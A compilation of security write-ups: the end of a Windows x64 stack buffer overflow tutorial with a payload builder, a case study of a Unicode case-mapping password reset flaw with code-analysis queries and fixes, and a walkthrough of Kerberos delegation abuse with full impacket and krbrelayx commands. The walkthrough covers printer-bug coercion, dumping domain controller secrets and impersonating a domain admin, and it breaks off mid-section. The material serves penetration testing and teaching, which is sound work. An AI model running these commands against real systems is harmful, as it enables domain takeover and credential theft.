      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xF8\x0E\x7E\x77");

And we have control over the program.
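If you prefer to generate the payload rather than type it by hand, a sketch like the following works. The gadget address 0x777E0EF8 is simply the one from my system (the four bytes at the end of the call above), and build_payload is a name I chose for this illustration; both will differ in your setup.

```python
import struct


def build_payload(offset, gadget_address, filler=b"\xCC"):
    """Return filler bytes up to the return address, then the 4 low bytes of the gadget."""
    gadget = struct.pack("<I", gadget_address)  # little-endian, 4 bytes
    payload = filler * offset + gadget
    if b"\x00" in payload:
        # strcpy would stop copying here and the return address would never be reached.
        raise ValueError("payload contains a NUL byte; strcpy would truncate it")
    return payload


payload = build_payload(56, 0x777E0EF8)
print(len(payload), payload[-4:].hex())  # 60 f80e7e77
```

Only 4 bytes of the return address are written explicitly. The terminating NULL that strcpy appends clears the fifth byte (0x01 in the original return address 0000000140001030), so the slot ends up holding 00000000777E0EF8.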

Please note that the buffer is small and it might be difficult to find useful shellcode that fits in this space. The purpose of the article, however, was to show a way to exploit this vulnerability that can be easily understood.

Conclusion

Maybe this article did not cover a real-life situation, but it should be enough as a starting point in exploiting Stack Based Buffer Overflows on Windows 64 bits.

My recommendation is to compile yourself a program like this one and try to exploit it yourself. You can download my simple Visual Studio 2017 project from here.

Case Study : Exploiting a Business Logic Flaw with GitHub’s Forgot Password workflow (discovered by John Gracey)

Original text by Chetan Conikee

John Gracey of Wisdom published a very interesting business logic flaw in GitHub’s reset password workflow on November 28th, 2019. It was acknowledged and fixed by GitHub’s security team. If not mitigated, this flaw can lead to account takeover vulnerability (specifically for accounts with 2FA not enabled).

From ASCII to Unicode

ASCII (American Standard Code for Information Interchange) became the first widespread encoding scheme. However, it was limited to only 128 character definitions. This was fine for the most common English characters, numbers, and punctuation, but slowly became limiting for the rest of the world.

Naturally, the rest of the world wanted the same encoding scheme for their characters too, which was why the Unicode standard was created. The objective of Unicode was to unify all the different encoding schemes so that the confusion between computers can be limited as much as possible.

As John Gracey points out, developers’ understanding of Unicode is often limited to internationalization, and hence they fail to grok the details of Unicode code points and code units. This lack of understanding can lead to an inherent vulnerability called Unicode Case Mapping Collision.

Loosely speaking, a collision occurs when two different characters are uppercased or lowercased into the same character. This effect is found commonly at the boundary between two different protocols, like email and domain names.

~ John Gracey
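To see such collisions for yourself, here is a rough Python sketch that scans a range of code points for characters whose uppercase or lowercase form is a single ASCII letter. The function name and the scanned range are my own choices, and the exact mappings depend on the Unicode data shipped with your Python version.

```python
def find_ascii_case_collisions(start=0x80, stop=0x3000):
    """Map each non-ASCII character in the range to the ASCII letter it collides with."""
    collisions = {}
    for code_point in range(start, stop):
        ch = chr(code_point)
        for mapped in (ch.lower(), ch.upper()):
            # Keep only one-character results that are plain ASCII letters.
            if len(mapped) == 1 and mapped.isascii() and mapped.isalpha():
                collisions[ch] = mapped
    return collisions


for ch, mapped in find_ascii_case_collisions().items():
    print(f"U+{ord(ch):04X} {ch!r} -> {mapped!r}")
```

Among the results are the dotless ı (U+0131), which uppercases to “I”, the long s ſ (U+017F), which uppercases to “S”, and the Kelvin sign (U+212A), which lowercases to “k”. Note the direction: in Python the dotless ı collides when uppercased, while the Kelvin sign collides when lowercased.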

On November 24th 2019, GetWisdom published an exhaustive list of case mapping collisions with the English alphabet here. Following this article, John published a detailed case study of the logic flaw here. I’d recommend that you read John’s post in detail before you proceed further.

Hacking Unicode Case Mapping Collision

Let us attempt to emulate the business logic workflow associated with the resetPassword functionality:

  1. Attacker enumerates with a unicode character embedded in local part of email address (not domain part). For example:`jıll@service.com`
  2. Attacker clicks forgot-password and types the email (for example: `jıll@service.com` where `ı` is the unicode character)
  3. The business logic supporting forgot-password function receives the attacker controlled email address and case-folds (toLowerCase) as a part of sanitization practice. This case folding transformation leads to a Unicode Case Mapping Collision which fundamentally transforms the identity to another user’s email address — `jıll@service.com` with a unicode `ı` is transformed into `jill@service.com` due to case mapping collision.
  4. Of course, the validation passes leading to next step of creating a reset link and dispatching an email to address specified via request (which is attacker controlled) and NOT to email-address associated with registered account (retrieved after validating identity).

Let us use this sample spring-boot based application (forked and revised) with forgot-password functionality that emulates both the best-case and worst-case scenarios associated with this logic flaw: conikeec/spring-security-registration (github.com).

Refer to controller logic supporting password reset here (with all symptoms that can lead to an exploit)

  1. Attacker enumerates Forgot Password function in SaaS service with an embedded unicode character.
  2. Attacker controlled userEmail parameter is injected into the resetPasswordBad controller routine.
  3. Validation function findUserByEmail accepts the attacker controlled email address, which has been transformed (via case folding), and passes the validation condition (if a registered user exists).
  4. Email with the reset password link is now sent to the address specified via request (which is attacker controlled) and NOT to the email address associated with the registered account (retrieved after validating identity).
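The four steps above can be sketched in a few lines of Python. This is not the code of the sample application: the user store, the function names (snake_case stand-ins for findUserByEmail and resetPasswordBad) and the addresses are all hypothetical. I also use the Kelvin sign (U+212A) instead of the dotless ı, because Python's lower() maps the Kelvin sign to “k”, whereas the dotless ı only collides when uppercased.

```python
REGISTERED_USERS = {"mike@service.com"}  # hypothetical user store


def find_user_by_email(email):
    """Look up a user after case folding, as the validation routine does."""
    normalized = email.lower()
    return normalized if normalized in REGISTERED_USERS else None


def reset_password_bad(user_email):
    """Vulnerable flow: the reset link goes to the address taken from the request."""
    if find_user_by_email(user_email) is None:
        return None
    return user_email  # recipient is attacker controlled


def reset_password_good(user_email):
    """Safer flow: the reset link goes to the address stored for the account."""
    account_email = find_user_by_email(user_email)
    if account_email is None:
        return None
    return account_email  # recipient comes from the user store


attacker_email = "mi\u212ae@service.com"  # Kelvin sign instead of 'k'
print(reset_password_bad(attacker_email) == attacker_email)  # True
print(reset_password_good(attacker_email))                   # mike@service.com
```

Both variants pass validation for the attacker's input. The only difference is which address is used as the recipient, and that is exactly the misstep the data flow queries in the next section look for.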

Automated verification of Business Logic flaws in source code

Let’s fire up ShiftLeft’s Ocular query engine and trace through information flows in order to identify all of the missteps leading to this Business Logic Flaw.

git clone git@github.com:conikeec/spring-security-registration.git

cd spring-security-registration

//compile and create package artifact
mvn -Dmaven.test.skip=true clean package

// Download trial distribution of Ocular (https://ocular.shiftleft.io). Install and thereafter fire up the prompt to commence investigation

./ocular.sh

createCpgAndSp("/Users/chetanconikee/pgithub/spring-security-registration/target/spring-security-login-and-registration.war")


//retrieve controller mapped to resetPassword route
case class RouteMapping(routeName : String, backingController : String)
val attackSurface = cpg.annotation.name("RequestMapping").map(x =>
    RouteMapping(x.start.parameterAssign.value.code.l.head, x.start.method.fullName.l.head)
).l

//output
attackSurface: List[RouteMapping] = List(
  RouteMapping(
    "[\"/user/updatePassword\"]",
    "org.baeldung.web.controller.RegistrationController.changeUserPassword:org.baeldung.web.util.GenericResponse(java.util.Locale,org.baeldung.web.dto.PasswordDto)"
  ),
  RouteMapping(
    "[\"/user/changePassword\"]",
    "org.baeldung.web.controller.RegistrationController.showChangePasswordPage:java.lang.String(java.util.Locale,org.springframework.ui.Model,long,java.lang.String)"
  ),
  RouteMapping(
    "[\"/registrationConfirm\"]",
    "org.baeldung.web.controller.RegistrationController.confirmRegistration:java.lang.String(javax.servlet.http.HttpServletRequest,org.springframework.ui.Model,java.lang.String)"
  ),
  RouteMapping(
    "[\"/loggedUsersFromSessionRegistry\"]",
    "org.baeldung.web.controller.UserController.getLoggedUsersFromSessionRegistry:java.lang.String(java.util.Locale,org.springframework.ui.Model)"
  ),
  RouteMapping(
    "[\"/user/resendRegistrationToken\"]",
    "org.baeldung.web.controller.RegistrationController.resendRegistrationToken:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)"
  ),
  RouteMapping(
    "[\"/loggedUsers\"]",
    "org.baeldung.web.controller.UserController.getLoggedUsers:java.lang.String(java.util.Locale,org.springframework.ui.Model)"
  ),
  RouteMapping(
    "[\"/user/resetPassword\"]",
    "org.baeldung.web.controller.RegistrationController.resetPassword:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)"
  ),
  RouteMapping(
    "[\"/user/registrationCaptcha\"]",
    "org.baeldung.web.controller.RegistrationCaptchaController.captchaRegisterUserAccount:org.baeldung.web.util.GenericResponse(org.baeldung.web.dto.UserDto,javax.servlet.http.HttpServletRequest)"
  ),
  RouteMapping(
    "[\"/user/savePassword\"]",
    "org.baeldung.web.controller.RegistrationController.savePassword:org.baeldung.web.util.GenericResponse(java.util.Locale,org.baeldung.web.dto.PasswordDto)"
  ),
  RouteMapping(
    "[\"/user/registration\"]",
    "org.baeldung.web.controller.RegistrationController.registerUserAccount:org.baeldung.web.util.GenericResponse(org.baeldung.web.dto.UserDto,javax.servlet.http.HttpServletRequest)"
  ),
  RouteMapping(
    "[\"/user/update/2fa\"]",
    "org.baeldung.web.controller.RegistrationController.modifyUser2FA:org.baeldung.web.util.GenericResponse(boolean)"
  ),
  RouteMapping(
    "[\"/user/resetPasswordBad\"]",
    "org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)"
  )
)

At this stage we have extracted the attack surface and identified all controller functions mapped to exposed routes. Let us proceed to next step.

The route of particular interest to us is:

RouteMapping("[\"/user/resetPasswordBad\"]", "org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)")

CONDITION #1 : Attacker controlled vector (email) with unicode in local part is case folded and then passed to database validation routine

//define the source function and attacker controlled vector (which is the email address parameter)
val source = cpg.method.fullNameExact("org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)").parameter.evalType("java.lang.String")

// The DB lookup function is a part of the IUserService interface, implemented by UserService here https://github.com/conikeec/spring-security-registration/blob/master/src/main/java/org/baeldung/service/UserService.java#L136
val DB_LOOKUP_FN_EXPR = ".*findUserByEmail.*"

//define the sink function that participates in the data flow
val sink = cpg.method.name(DB_LOOKUP_FN_EXPR).parameter.evalType("java.lang.String")

// Verify BUSINESS LOGIC FLAW: check whether the attacker-controlled vector (email) is case folded prior to the DB lookup
sink.reachableBy(source).flows.passes(_.isCall.name(".*toLowerCase.*")).p

  """ _____________________________________________________________________________________________________________________
 | tracked                | lineNumber| method               | file                                                   |
 |====================================================================================================================|
 | userEmail              | 134       | resetPasswordBad     | org/baeldung/web/controller/RegistrationController.java|
 | userEmail              | 135       | resetPasswordBad     | org/baeldung/web/controller/RegistrationController.java|
 | this                   | N/A       | toLowerCase          | java/lang/String.java                                  |
 | ret                    | N/A       | toLowerCase          | java/lang/String.java                                  |
 | userEmail.toLowerCase()| 135       | resetPasswordBad     | org/baeldung/web/controller/RegistrationController.java|
 | param1                 | N/A       | <operator>.assignment| N/A                                                    |
 | param0                 | N/A       | <operator>.assignment| N/A                                                    |
 | $r1                    | 135       | resetPasswordBad     | org/baeldung/web/controller/RegistrationController.java|
 | $r1                    | 135       | resetPasswordBad     | org/baeldung/web/controller/RegistrationController.java|
 | param0                 | N/A       | findUserByEmail      | org/baeldung/service/IUserService.java                 |
"""

CONDITION #2 : If condition #1 passes, a reset token of a registered user is sent to attacker controlled email (with embedded unicode character)

//define the source function and attacker controlled vector (which is the email address parameter)
val source = cpg.method.fullNameExact("org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)").parameter.evalType("java.lang.String")

//define email channel sink function name
val EMAIL_CHANNEL_SINK="org.springframework.mail.javamail.JavaMailSender.send:void(org.springframework.mail.SimpleMailMessage)"

//define the sink function that participates in the data flow
val sink = cpg.method.fullNameExact(EMAIL_CHANNEL_SINK).parameter.evalType("java.lang.String")

// Verify BUSINESS LOGIC FLAW: check whether the attacker-controlled vector (email) is used in the emailSend function, rather than the registered user email (determined after fetch from DB in step #1)
sink.reachableBy(source).flows.p

//results
res58: List[String] = List(
  """ __________________________________________________________________________________________________________________________________________________________________
 | tracked                                                       | lineNumber| method                     | file                                                   |
 |=================================================================================================================================================================|
 | userEmail                                                     | 134       | resetPasswordBad           | org/baeldung/web/controller/RegistrationController.java|
 | userEmail                                                     | 139       | resetPasswordBad           | org/baeldung/web/controller/RegistrationController.java|
 | userEmail                                                     | 198       | constructResetTokenEmailBad| org/baeldung/web/controller/RegistrationController.java|
 | userEmail                                                     | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/RegistrationController.java|
 | userEmail                                                     | 213       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | userEmail                                                     | 217       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | param0                                                        | N/A       | setTo                      | org/springframework/mail/SimpleMailMessage.java        |
 | this                                                          | N/A       | setTo                      | org/springframework/mail/SimpleMailMessage.java        |
 | email                                                         | 217       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | email                                                         | 218       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | this                                                          | N/A       | setFrom                    | org/springframework/mail/SimpleMailMessage.java        |
 | this                                                          | N/A       | setFrom                    | org/springframework/mail/SimpleMailMessage.java        |
 | email                                                         | 218       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | email                                                         | 219       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | ret                                                           | 213       | constructEmailBad          | org/baeldung/web/controller/RegistrationController.java|
 | this.constructEmailBad("Reset Password",$r11,userEmail)       | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/RegistrationController.java|
 | param1                                                        | N/A       | <operator>.assignment      | N/A                                                    |
 | param0                                                        | N/A       | <operator>.assignment      | N/A                                                    |
 | $r12                                                          | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/RegistrationController.java|
 | $r12                                                          | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/RegistrationController.java|
 | ret                                                           | 198       | constructResetTokenEmailBad| org/baeldung/web/controller/RegistrationController.java|
 | this.constructResetTokenEmailBad($r9,$r10,token,$l0,userEmail)| 139       | resetPasswordBad           | org/baeldung/web/controller/RegistrationController.java|
 | param1                                                        | N/A       | <operator>.assignment      | N/A                                                    |
 | param0                                                        | N/A       | <operator>.assignment      | N/A                                                    |
 | $r12                                                          | 139       | resetPasswordBad           | org/baeldung/web/controller/RegistrationController.java|
 | $r12                                                          | 139       | resetPasswordBad           | org/baeldung/web/controller/RegistrationController.java|
 | param0                                                        | N/A       | send                       | org/springframework/mail/javamail/JavaMailSender.java  |
"""
)

Safe Coding to prevent this business logic flaw

  1. Monitor for an anomalous volume of password resets (forgot password requests) initiated against your application. An attacker is most likely enumerating your endpoint.
  2. Use two factor authentication (2FA) as a part of validation and reset functions.
  3. As John Gracey suggests, use punycode conversion as a part of your registration, validation and reset functions. Validate both the local and the domain part of email addresses.
  4. Continuously verify your entire fleet of applications in a CI/CD pipeline to ensure that none of the conditions above are violating baseline checks in any current and future releases.
  5. Send out password reset email ONLY to the original email address that was used to create the account and NOT to email address controlled by attacker.
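As one extra defensive layer on top of the list above, an application could flag addresses that contain characters known to collide with ASCII under case mapping. The Python sketch below is my own illustration of that idea (has_case_collision is a hypothetical helper), not something taken from John Gracey's write-up or the sample application.

```python
def has_case_collision(email):
    """Return True if a non-ASCII character turns into ASCII when its case is changed."""
    for ch in email:
        if ch.isascii():
            continue
        # A non-ASCII character whose upper or lower form is pure ASCII
        # can be confused with a different, legitimate address.
        if ch.lower().isascii() or ch.upper().isascii():
            return True
    return False


print(has_case_collision("jıll@service.com"))  # True, dotless ı uppercases to I
print(has_case_collision("jill@service.com"))  # False
print(has_case_collision("rené@service.com"))  # False, é never maps to ASCII
```

A check like this does not replace item 5: sending the reset email only to the address stored with the account remains the fix that removes the flaw.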

ShiftLeft is an application security platform built over the foundational Code Property Graph that is uniquely positioned to deliver a specification model to query for vulnerable conditions, business logic flaws and insider attacks that might exist in your application’s codebase.

If you’d like to learn more about ShiftLeft, please request a demo.

Stay Safe!

No Shells Required — a Walkthrough on Using Impacket and Kerberos to Delegate Your Way to DA

Original text by Red XOR Blue

There are a ton of great resources that have been released in the past few years on a multitude of Kerberos delegation abuse avenues.  However, most of the guidance out there is pretty in-depth and/or focuses on the usage of @Harmj0y’s Rubeus.  While Rubeus is a super well-written tool that can do quite a few things extremely well, in engagements where I’m already running off of a primarily Linux environment, having tools that function on that platform can be beneficial.  To that end, all the functionality we need to perform unconstrained, constrained, and resource-based constrained delegation attacks is already available to us in the impacket suite of tools.
This post will cover how to identify potential delegation attack paths, when you would want to use them, and give detailed walkthroughs of how to perform them on a Linux platform.  What we won’t be covering in this guide is a detailed background of Kerberos authentication, or how various types of delegation work in-depth, as there are some really great articles already out that go into a ton of detail on the inner-workings of the protocol.  If you are interested in a deeper dive, the most comprehensive & enlightening post I’ve read is @Elad_Shamir’s write-up: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

Unconstrained Delegation


What Is It?

Back in the early days of Windows Active Directory (pre-Server 2003) this was really the only way to delegate access, which at a high level effectively means configuring a service with privileges to impersonate users elsewhere on the network.  Unconstrained Delegation would be used for something like a front-end web server that needed to take in requests from users, and then impersonate those users to access their data on a second database server.  

Unfortunately, as the name implies, these impersonation rights were not limited to a single system or service, but rather allowed a configured account to impersonate anyone that authenticated against it anywhere on the network.  This is due to the fact that when an object authenticates to a service tied to an account configured with unconstrained delegation, they send the remote service a copy of their TGT (Ticket Granting Ticket), which allows the remote system to generate new TGS (Ticket Granting Service / service ticket) requests at-will.  These TGS’ are used for authenticating to Kerberos-enabled services across the network, meaning that if you possess an object’s TGT you can impersonate them anywhere on the network where you can authenticate with Kerberos.

When To Use:

If you can gain access to an account (user or computer) that is configured with unconstrained delegation.  To identify users & computers configured with unconstrained delegation I use pywerview, a python port of a good chunk of powerview’s functionality (https://github.com/the-useless-one/pywerview) but feel free to use whatever tool works best for you. This tool has handy flags to pull accounts configured with either constrained or unconstrained delegation.  In this case what we’re really looking for is any user or computer with a UserAccountControl attribute that includes ‘TRUSTED_FOR_DELEGATION’.  All we’ll need at this point is a set of creds for AD to allow us to do the enumeration.  Taking a look at the output of the check we ran below, we can see that the user ‘unconstrained’ is configured with unconstrained delegation:
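Separately from the tool output, it can help to know what the flag check boils down to. UserAccountControl is a bit field, and TRUSTED_FOR_DELEGATION is the 0x80000 bit. The Python sketch below decodes a raw value into flag names; the table only lists a handful of the documented flags, and the sample value is made up for illustration.

```python
# A subset of the documented userAccountControl bit flags.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]


def is_unconstrained(value):
    """True if the account is trusted for (unconstrained) delegation."""
    return bool(value & 0x80000)


sample = 0x80200  # hypothetical user account: NORMAL_ACCOUNT + TRUSTED_FOR_DELEGATION
print(decode_uac(sample), is_unconstrained(sample))
```

This is handy when all you have is the numeric attribute from an LDAP dump rather than the decoded output of a tool.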

If you find you have access to a computer object that is configured with unconstrained delegation, it may be easier simply to perform the print spooler attack and extract the ticket from memory using Rubeus, as detailed here: https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1.  However, if you have access to a user account configured with delegation or would prefer to avoid running code on remote systems as much as possible, the following should be helpful.

Process Walkthrough:

Note: This section is pretty much a direct walkthrough of the awesome work @_dirkjan wrote up in his blog here: https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/ If you’re familiar with this style of attack it’s nothing new, just a (hopefully) fairly straightforward walkthrough of the path that I’ve had the most success with on engagements after identifying unconstrained delegation.
If we do end up identifying any user accounts configured with unconstrained delegation, we’ll want to obtain Kerberos tickets we can attempt to crack.  For an account to be configured with delegation, they also need to be configured with an SPN (Service Principal Name).  This means that we should be able to retrieve a crackable Kerberos ticket for the account using GetUserSPNs.py

GetUserSPNs.py DOMAIN/USER:PASSWORD -request-user UNCONSTRAINED_USER

Assuming we’re able to recover the password for an account / used another method to get admin access on a computer configured with unconstrained delegation, we can now move on to attempting to leverage this access to get DA on the network.  We’ll start by attempting to add an SPN to the account we have access to. This is the only part of the attack that will require non-default settings to be configured (for a user account), but per all the sql devs on stack exchange asking how to enable it, it seems to be something that should be commonly turned on already.  If we have access to a computer account configured with unconstrained delegation, we can use the ‘Validated write to DNS host name’ security attribute (configured by default) to add an additional hostname to the object, which will automatically configure new SPN’s that will also be configured with unconstrained delegation. We then just have to create a new DNS record to point that new hostname to us.
We’ll be using dirk-jan’s krbrelayX toolkit for the rest of this process (https://github.com/dirkjanm/krbrelayx), first using addspn.py to attempt to add a ‘host’ spn for a nonexistent system on the network.  Note – it is important to ensure when you’re adding an SPN you use the fqdn of the network, not just the hostname.  You’ll see one of two messages, based on if your account has privileges to modify its own SPN’s (above = an account with appropriate attributes set, below = attribute not set).

addspn.py -u DOMAIN\\USER -p PASSWORD -s host/FAKESYSTEM.FQDN ldap://DC.FQDN

If you don’t have privileges, this is pretty much the end of this potential vector, although I would still recommend targeting the system(s) on which the account has SPN’s configured, as they likely have TGT’s in-memory.
However, if we are able to successfully add an SPN for a non-existent system we can keep going.  Next, we’ll want to add a DNS record for this same non-existent system that links back to our system’s IP, effectively turning our system into this non-existent system.  Due to the actions we took in the last step (creating an SPN for the ‘host’ service with our user configured with unconstrained delegation on this non-existent hostname that now points to our system), we are basically creating a new ‘computer’ on the network that has unconstrained delegation configured on the ‘host’ service on it. 
We’ll be using another part of the krbrelayx toolkit, dnstool.py, to create a new DNS record and point it at the IP of our attack box (Note: DNS records take ~3 minutes to update, so don’t worry if you complete this step and can’t immediately ping / nslookup your new host):

dnstool.py -u DOMAIN\\USERNAME -p PASSWORD -r FAKESYSTEM.FQDN -a add -d YOUR_IP DC_HOSTNAME

Everything should be ready to go now, we’ll execute the print spooler bug to force the DC$ account to attempt to authenticate to the host service of our new ‘computer’ that is configured with unconstrained delegation.  This will in turn cause the DC to provide a copy of its TGT when authenticating, which we can then use to impersonate it on any other Kerberos-enabled service.  In one window we’ll set up krbrelayx.py as follows: **This is very important**  the krbsalt is the FQDN of the domain in ALL CAPS, followed immediately by the username (case-sensitive).  The Krbpass is the user’s password, nothing crazy there.

krbrelayx.py --krbsalt DOMAIN.FQDNUsernameCaseSensitive --krbpass PASSWORD
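Because a wrong salt is the easiest way to break this step, here is a small sketch of how the salt string for a user account is assembled from the rule described above (domain FQDN in upper case, followed immediately by the case-sensitive username). The function names and the sample values are hypothetical; only the two krbrelayx.py flags come from the command above.

```python
def krb_salt(domain_fqdn, sam_account_name):
    """Salt for a user account: upper-cased domain FQDN + username, case preserved."""
    return domain_fqdn.upper() + sam_account_name


def krbrelayx_args(domain_fqdn, sam_account_name, password):
    """Assemble the argument list for the krbrelayx.py invocation shown above."""
    return [
        "krbrelayx.py",
        "--krbsalt", krb_salt(domain_fqdn, sam_account_name),
        "--krbpass", password,
    ]


if __name__ == "__main__":
    # Hypothetical lab values for illustration only.
    print(" ".join(krbrelayx_args("testlab.local", "unconstrained", "PASSWORD")))
```

Note that only the domain part is upper-cased; changing the case of the username produces a different salt and therefore a different key.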

Once you have that running in one window, we’ll use the final tool within the krbrelayx toolkit to kick off the attack (Note: The user used to kick off the attack doesn’t matter, it can be any domain user).  The below shows what the successful attack looks like:

printerbug.py DOMAIN/USERNAME:PASSWORD@DC_HOSTNAME FAKE_SYSTEM.FQDN

On our krbrelayx window, we should see that we have gotten an inbound connection, and have obtained a tgt (formatted as .ccache) file for the DC$ account:

At this point, we just need to export the ticket we received into memory, after which we should be able to run secretsdump against the DC:

export KRB5CCNAME=CCACHE_FILE.CCACHE

secretsdump.py -k DC_Hostname -just-dc





Constrained Delegation


What Is It?

Microsoft’s next iteration of delegation included the ability to limit where objects had delegation (impersonation) rights to.  Now a front-end web server that needed to impersonate users to access their data on a database could be restricted; allowing it to only impersonate users on a specific service & system.  However, as we will find out, the portion of the ticket that limits access to a certain service is not encrypted.  This gives us some room to gain additional access to systems if we gain access to an object configured with these rights.

When To Use:

If you can gain access to an account (user or computer) that is configured with constrained delegation.  You can find this by searching for the ‘TRUSTED_TO_AUTH_FOR_DELEGATION’ value in the UserAccountControl attribute of AD objects.  This can also be found through the use of Pywerview, as outlined in the above section.

Process Walkthrough:

This time, we’ll start by targeting another account, httpDelegUser.  As we can see from our initial enumeration with Pywerview, this account has the ‘TRUSTED_TO_AUTH_FOR_DELEGATION’ flag set.  We can also check the contents of the account’s msDS-AllowedToDelegateTo attribute to determine that it has delegation privileges to the www service on Server02.  Not the worst thing in the world, but probably not going to get us a remote shell.

Also a quick recap of the account’s group memberships:

To start this attack, we’ll use another impacket tool – getST.py – to retrieve a ticket for an impersonated user to the service we have delegation rights to (the www service on server02 in this case).  In this example we’ll impersonate ‘bob’, a domain admin in this environment.  Note: If a user is marked as ‘Account is sensitive and cannot be delegated’ in AD, you will not be able to impersonate them.

getST.py -spn SERVICE/HOSTNAME_YOU_HAVE_DELEGATION_RIGHTS_TO.FQDN -impersonate TARGET_USER DOMAIN/USERNAME:PASSWORD

From here, the initial assumption would be that we could only authenticate against the www service on server02 with this ticket.  However, Alberto Solino discovered that the service name portion of the ticket (sname) is not actually a protected part of the ticket.  This allows us to change the sname to any value we want, as long as it’s another service running under the same account as the original one we have delegation rights to.  For example, if our account (httpDelegUser) has delegation rights to a service that the server02 computer object is running (example SPN: www/server02), we can change our sname to any other SPN associated with server02 (ex. cifs/server02).  His blog on the mechanism by which this occurs is super insightful, and worth a read:  https://www.secureauth.com/blog/kerberos-delegation-spns-and-more
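To make the idea concrete, the sketch below shows only the string-level part of the change: the service class in front of the slash is swapped while the host part stays the same. This is not impacket’s code and it does not touch a real ticket; the function name is hypothetical.

```python
def swap_service_class(spn, new_service):
    """Return the SPN with its service class replaced, keeping the host part."""
    service, sep, rest = spn.partition("/")
    if not service or not sep or not rest:
        raise ValueError("expected an SPN of the form service/host, got %r" % spn)
    return new_service + "/" + rest


if __name__ == "__main__":
    # The example from the text: delegation rights to www, access wanted over cifs.
    print(swap_service_class("www/server02", "cifs"))
```

The swap only makes sense when both SPNs are served by the same account, as described above, because the ticket stays encrypted with that account’s key.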
Even better for us, as Alberto Solino is one of the primary writers of impacket, he built this logic in so that these sname conversions happen automatically for us on the back-end:

From an operational standpoint, what this means is that the ticket for the www service we obtained in the step above can be loaded into memory and used with just about any of the impacket suite of tools to run commands, dump SAM, etc.



Resource-Based Constrained Delegation


What Is It?

Note: Microsoft is releasing an update in January 2020 that will enable LDAP channel binding & LDAP signing by default on Windows systems, remediating this potential attack vector on fully patched systems. 

Starting with Windows Server 2012, objects in AD could set their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, effectively allowing objects to set what remote objects had rights to delegate to them.  This allows those remote objects with delegation rights to impersonate any account in AD to any service on the local system.  Therefore, if we can convince a remote system to add an object that we control to their msDS-AllowedToActOnBehalfOfOtherIdentity attribute, we can use it to impersonate any other user not marked as ‘Account is sensitive and cannot be delegated’ on it.

When To Use:

Basically, when you’re on a network and want to get a shell on a different system on that same network segment.  This attack can be run without needing any prior credentials, as described by @_dirkjan in his blog here: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ .  However, the method described does require that a domain controller in the environment is configured with LDAPS, which seems to be somewhat uncommon based on the environments I’ve tested against over the past 6 months.

I’ll focus on a secondary scenario for this attack – one where you have compromised a standard low-privilege user account (no admin rights) or a computer account, and are on a network segment with other systems you want to compromise.

Process Walkthrough:

To begin with, what this attack really needs is *some* sort of account that is configured with an SPN.  This can be a computer account, a user account that is already configured with an SPN, or can be a computer account we create using a non-privileged user account by taking advantage of a default MachineAccountQuota configuration (https://blog.netspi.com/machineaccountquota-is-useful-sometimes/).  We need an account that is configured with an SPN as this is a requirement if we want the TGS produced by S4U2Self to be forward-able (Read more why this is necessary here: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#a-misunderstood-feature-1).  Computer accounts work as by default they are configured with a variety of SPN’s for all their various Kerberos-enabled services.
So, in our example let’s say we only have a low privilege account (we’ll use the ‘tim’ account). 

The first step in the process would be to try and create a computer account, so that we could gain control of an account configured with SPN’s.  To do this, we’ll use a relatively new impacket example script – addcomputer.py.  This script has a SAMR option to add a new computer, which functions over SMB and uses the same mechanism as when a new computer is added to a domain using the Windows GUI.

addcomputer.py -method SAMR -computer-pass MADE_UP_PASSWORD -computer-name MADE_UP_NAME DOMAIN/USER:PASSWORD

After running this command, your new computer object will be added to AD (Note: this example script was not fully working for me in python2.7 – the computer object was added but its password was not being appropriately set.  It does work using Python3.6 though.)

This script was released fairly recently; before that, I used PowerMad.ps1 from a Windows VM to perform the same actions.  This tool uses a standard LDAP connection vs. SAMR, but the end result is the same.  For further info on PowerMad I recommend the following: https://github.com/Kevin-Robertson/Powermad
If this part of the attack didn’t work, the default MachineAccountQuota has likely been changed for users in the environment.  In that case you’ll need to use alternative methods to obtain a computer account / user account configured with an SPN.  However, once you have that, you can continue to proceed as described below.
